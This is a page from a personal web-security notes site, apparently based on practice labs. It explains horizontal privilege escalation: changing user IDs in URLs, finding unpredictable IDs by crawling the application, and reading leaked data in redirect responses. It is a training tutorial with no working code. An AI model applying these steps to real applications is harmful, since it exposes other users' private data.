Passion
  • What is this GitBook about ?
  • Privilege Escalation
    • Linux
    • Windows
  • Network Security
    • Port Scanning
    • DNS Enumeration
    • FTP Enumeration
    • SSH Enumeration
    • SMB Enumeration
    • SMTP Enumeration
    • POP3 Enumeration
  • Checklists
    • Active Directory Security
    • OS Command Injection
    • Buffer Overflow
    • Broken Access Control
    • Local File Inclusion
    • SSRF
    • XXE Attacks
    • SQL Injection
    • XSS
  • WebApp Security
    • Local File Inclusion
    • File Upload Attacks
      • IIS Server File Upload
      • Escaping Sandbox via File Upload
    • Broken Access Control
      • Vertical PrivEsc
      • Horizontal PrivEsc
      • Horizontal => Vertical
    • OS Command Injection
    • SSTI
      • Finding the Injection Point
      • Indentification
      • Exploitation
    • XXE Attacks
      • XXE to LFI
      • XXE to SSRF
      • XXE via File upload
      • XInclude Attacks
      • Blind XXE Attacks
        • Identification
        • Exploitation
        • Blind XXE to LFI
        • Blind XXE by defining Local DTD
    • SQL Injection
    • Server Side Request Forgery
      • Various Attack Methods
      • Exploiting Blind SSRF
    • OAuth Attacks
      • In Password-Based Logins
    • XSS
      • Reflected XSS
      • Stored XSS
      • DOM XSS
      • Blind XSS
      • Perfecting our Payload
      • Exploiting Blind XSS
  • WebApp Mitigations
    • SSTI
  • Docker Security
    • Configuration
    • Ngnix Deployment
  • ☁️Cloud Security
    • AWS
      • Cloud Breach S3
      • IAM PrivEsc - RollBack
      • IAM PrivEsc - Attachment
Powered by GitBook
On this page
  • User ID controlled by Request Parameter
  • Request Parameter with Unpredictable user ID's
  • Request Parameter with Data Leakage in Redirect
  1. WebApp Security
  2. Broken Access Control

Horizontal PrivEsc

Horizontal PrivEsc refers to accessing directly the sensitive information of the other user, instead of using thier own resources.

For Example - If an employee is said to have his own payroll records or his own docs, but still he tries to access other employee's details then its a horizontal privesc.

This type of Privesc is similar to the Vertical one where the user tries to access the contents of another user by tampering the URL

https://example.com/myaccount=123

We get his API key !

An API key is a unique identifier used to authenticate a user, developer, or calling program to an API.

User ID controlled by Request Parameter

In the given url, just tamper the username to carlos and it will retrieve an API key which is the flag.

Request Parameter with Unpredictable user ID's

In some application, the exploitable parameter does not have a sequential value, an application might use GLOBALLY UNIQUE IDENTIFIERS to identify users.

It is tough for an attacker to guess the user's id so our only option is to check through the application throughly so that we find it in user messages or reviews.

Crawl through the application and find another user's id and tamper it using our login's GET

Request Parameter with Data Leakage in Redirect

Some application detects when the user is not permitted to access any sensitive resource, and then it redirects to the Login page.

It is mandatory to check the response containing the redirect URL, because it might still contain some sensitive information belonging to the targeted user, If this case comes true then the attack is successful.

Check the response body of the redirect URL for some API Leaks

PreviousVertical PrivEscNextHorizontal => Vertical

Last updated 2 years ago